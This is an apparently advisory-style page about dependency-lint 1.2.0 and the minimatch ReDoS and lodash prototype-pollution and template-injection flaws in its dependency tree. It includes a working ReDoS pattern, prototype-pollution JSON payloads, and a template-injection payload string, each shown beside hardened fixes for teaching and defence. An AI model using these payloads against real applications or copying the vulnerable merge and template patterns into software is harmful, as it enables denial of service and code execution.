Dependency-lint is a tool for JavaScript developers who want to keep a project's npm dependencies tidy. Version 1.2.0 refines the linting process established in version 1.1.3. Both versions provide the same core function: linting the dependencies and devDependencies declared in a project's package.json, using detective to analyze the source and flag dependency issues such as packages that are required but not declared, or declared but never required. They share the same dependencies: async, coffee-script, colors, detective, docopt, fs-extra, glob, and lodash. The development tooling is likewise unchanged: chai, chai-fs, coffeelint, cucumber, mycha, and tmp.
Version 1.2.0 was released on February 17, 2015, one day after 1.1.3 (February 16, 2015). The metadata does not record what changed, so the update can only be read as a maintenance release: new users should start from 1.2.0, and existing users lose nothing by upgrading. Because the two versions declare the same dependencies, moving from 1.1.3 to 1.2.0 is not by itself a fix for the advisories below, which concern lodash (a direct dependency) and minimatch (pulled in through glob); what matters there is which versions of those two packages the project's lockfile actually resolves.
Known vulnerabilities in the dependency tree of version 1.2.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern). minimatch turns the glob pattern into a regular expression, so a crafted pattern such as the one below keeps the process busy for a very long time; the path argument is not the problem, the pattern is.
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i < len; i++) {
    result = result + chr;
  }
  return result;
};

// a negated character class opened with "[!" and stuffed with a million
// backslashes; processing this pattern is what hangs the process
var exploit = "[!" + genstr(1000000, "\\") + "A";

// minimatch exploit
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update minimatch to version 3.0.2 or later.
minimatch ReDoS vulnerability
A second Regular Expression Denial of Service (ReDoS) flaw was found in the minimatch package: calling the braceExpand function with specific arguments makes it run for an excessively long time, which results in a denial of service.
Prototype Pollution in lodash
Versions of lodash before 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep allows a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}}, adding a property, or modifying an existing one, that will then exist on all objects.
Update lodash to version 4.17.12 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.5 are vulnerable to prototype pollution. The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith', which allow a malicious user to modify the prototype of Object via __proto__, adding a property, or modifying an existing one, that will then exist on all objects.
Update lodash to version 4.17.5 or later.
Prototype Pollution in lodash
Versions of lodash before 4.17.11 are vulnerable to prototype pollution. The vulnerable functions are 'defaultsDeep', 'merge', and 'mergeWith', which allow a malicious user to modify the prototype of Object via {constructor: {prototype: {...}}}, adding a property, or modifying an existing one, that will then exist on all objects.
Update lodash to version 4.17.11 or later.
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers (the path segments) are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability adds a property, or modifies an existing one, that will then exist on all objects, and may lead to Denial of Service or Code Execution under specific circumstances.
Update lodash to version 4.17.19 or later.
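The four lodash advisories above describe two shapes of the same bug: a recursive merge that descends into a key named __proto__ or constructor (defaultsDeep, merge, mergeWith) and a path setter that walks a user-supplied path such as "__proto__.x" (set, setWith, update, updateWith, zipObjectDeep). The following is an added example, not lodash's own code: a naive merge and a naive path setter written in the style of the vulnerable functions, each beside a hardened version, run against constructed JSON payloads. The payload strings, the function names and the FORBIDDEN_KEYS list are this example's own choices.

```javascript
// Added example, not lodash's code: naive merge and path setter in the style
// of the vulnerable lodash functions, each beside a hardened version.

// Loose check in the spirit of lodash's isObject: functions count too, which
// is what lets `constructor` (a function) be descended into.
const isObjectLike = (v) =>
  v !== null && (typeof v === 'object' || typeof v === 'function');

// Strict check: only objects made by `{}` or JSON.parse. Object.prototype,
// Object (a function) and arrays all fail it.
function isPlainObject(v) {
  if (v === null || typeof v !== 'object') return false;
  const proto = Object.getPrototypeOf(v);
  return proto === Object.prototype || proto === null;
}

// VULNERABLE: recurses on every key of `source`. JSON.parse creates an own
// property literally named "__proto__", but reading target["__proto__"]
// goes through the inherited accessor and yields Object.prototype.
function naiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const s = source[key];
    if (isObjectLike(s)) {
      if (!isObjectLike(target[key])) target[key] = {};
      naiveMerge(target[key], s);
    } else {
      target[key] = s;
    }
  }
  return target;
}

// VULNERABLE: "a.b.c" walks into a.b and assigns c, so a path beginning with
// "__proto__." assigns straight onto Object.prototype.
function naiveSetPath(obj, path, value) {
  const parts = path.split('.');
  let cur = obj;
  for (const part of parts.slice(0, -1)) {
    if (!isObjectLike(cur[part])) cur[part] = {};
    cur = cur[part];
  }
  cur[parts[parts.length - 1]] = value;
  return obj;
}

// Hardened: refuse the three keys that reach a prototype, descend only into
// plain objects the target itself owns, never treat a function as a container.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function assertSafeKey(key) {
  if (FORBIDDEN_KEYS.has(key)) {
    throw new TypeError(`refusing prototype-reaching key "${key}"`);
  }
}
function ownPlainChild(parent, key) {
  if (!Object.prototype.hasOwnProperty.call(parent, key) ||
      !isPlainObject(parent[key])) parent[key] = {};
  return parent[key];
}
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    assertSafeKey(key);
    const s = source[key];
    if (isPlainObject(s)) safeMerge(ownPlainChild(target, key), s);
    else target[key] = s;
  }
  return target;
}
function safeSetPath(obj, path, value) {
  const parts = path.split('.');
  parts.forEach(assertSafeKey);
  let cur = obj;
  for (const part of parts.slice(0, -1)) cur = ownPlainChild(cur, part);
  cur[parts[parts.length - 1]] = value;
  return obj;
}

function throwsTypeError(fn) {
  try { fn(); return false; } catch (e) { return e instanceof TypeError; }
}

// Runs every variant against constructed payloads and reports what a fresh,
// unrelated object inherits afterwards; cleans Object.prototype up again.
function runDemo() {
  const protoPayload = JSON.parse('{"__proto__": {"viaProto": "polluted"}}');
  const ctorPayload =
    JSON.parse('{"constructor": {"prototype": {"viaCtor": "polluted"}}}');
  const results = {};
  try {
    naiveMerge({}, protoPayload);
    naiveMerge({}, ctorPayload);
    naiveSetPath({}, '__proto__.viaPath', 'polluted');
    const fresh = {};
    results.naive = { viaProto: fresh.viaProto, viaCtor: fresh.viaCtor,
                      viaPath: fresh.viaPath };
  } finally {
    delete Object.prototype.viaProto;
    delete Object.prototype.viaCtor;
    delete Object.prototype.viaPath;
  }
  results.hardened = {
    mergeProtoBlocked: throwsTypeError(() => safeMerge({}, protoPayload)),
    mergeCtorBlocked: throwsTypeError(() => safeMerge({}, ctorPayload)),
    setPathBlocked: throwsTypeError(() =>
      safeSetPath({}, '__proto__.viaPath', 'polluted')),
    legitimateMerge: safeMerge({ a: 1, nested: { keep: true } },
                               { nested: { add: 2 } }),
    legitimateSet: safeSetPath({}, 'a.b.c', 42),
    stillClean: ({}).viaProto === undefined && ({}).viaCtor === undefined &&
                ({}).viaPath === undefined,
  };
  return results;
}

console.log(JSON.stringify(runDemo(), null, 2));
```

Two details carry the lesson. First, the naive code never sees a key called "__proto__" as special: Object.keys on a JSON.parse result returns it like any other own property, and only the read target["__proto__"] resolves to Object.prototype. Second, the hardened version does not rely on the deny-list alone; it also refuses to descend into anything that is not a plain object the target already owns, so an inherited constructor or a function can never become the next merge target even if a new key shape is found.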
Command Injection in lodash
lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function: the value passed as the `variable` option is spliced into the generated JavaScript source without validation, so an attacker who controls that option can have arbitrary code compiled into the template.
Update lodash to version 4.17.21 or later.
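To make the template issue concrete, here is an added example rather than lodash's own code: a stripped-down template compiler that, like lodash's _.template, uses the `variable` option as the parameter name of the generated function, followed by an allowlist check that closes the injection. The template syntax (<%= %>), the PAYLOAD string and the IDENTIFIER regex are this example's own; lodash 4.17.21's actual validation differs in detail.

```javascript
// Added example, not lodash's code: a toy template compiler that splices the
// `variable` option into generated source, next to a hardened variant.

// Turns 'Hello <%= user.name %>!' into statements that build the string __p.
function compileBody(text) {
  return text.split(/<%=([\s\S]+?)%>/).map((chunk, i) =>
    i % 2 ? `__p += (${chunk});` : `__p += ${JSON.stringify(chunk)};`
  ).join('\n');
}

// VULNERABLE: `variable` becomes the parameter name of the generated function
// with no validation, so a value containing ")" and "{" escapes the parameter
// list and lands arbitrary statements in the compiled code.
function compileNaive(text, variable = 'obj') {
  const source =
    `return function(${variable}) {\nvar __p = '';\n${compileBody(text)}\nreturn __p;\n}`;
  return new Function(source)();
}

// Hardened: accept only a plain identifier for `variable` (this allowlist is
// the example's own, not lodash's exact check).
const IDENTIFIER = /^[A-Za-z_$][\w$]*$/;
function compileSafe(text, variable = 'obj') {
  if (!IDENTIFIER.test(variable)) {
    throw new TypeError(`invalid template variable option: ${JSON.stringify(variable)}`);
  }
  return compileNaive(text, variable);
}

// Constructed payload: closes the parameter list and the function body, then
// opens a dummy declaration so the rest of the generated source still parses.
// The injected statement only sets a marker so the demo stays harmless.
const PAYLOAD = '){ globalThis.__templateInjected = true; }; function __dummy(';

function runDemo() {
  const results = {};
  results.legit = compileSafe('Hello <%= user.name %>!', 'user')({ name: 'world' });
  try {
    // The "template" returned here is the attacker's function; calling it runs
    // the injected statement.
    compileNaive('Hello <%= user.name %>!', PAYLOAD)({});
    results.injectedRan = globalThis.__templateInjected === true;
  } finally {
    delete globalThis.__templateInjected;
  }
  try {
    compileSafe('Hello <%= user.name %>!', PAYLOAD);
    results.safeBlocked = false;
  } catch (e) {
    results.safeBlocked = e instanceof TypeError;
  }
  return results;
}

console.log(runDemo());
```

The point to take from this is where the boundary sits: the template text itself is expected to contain code, so the dangerous input is not the template but an option that most callers would assume is just a name. Any code generator that concatenates a caller-supplied token into source needs the same kind of allowlist before the string reaches Function or eval.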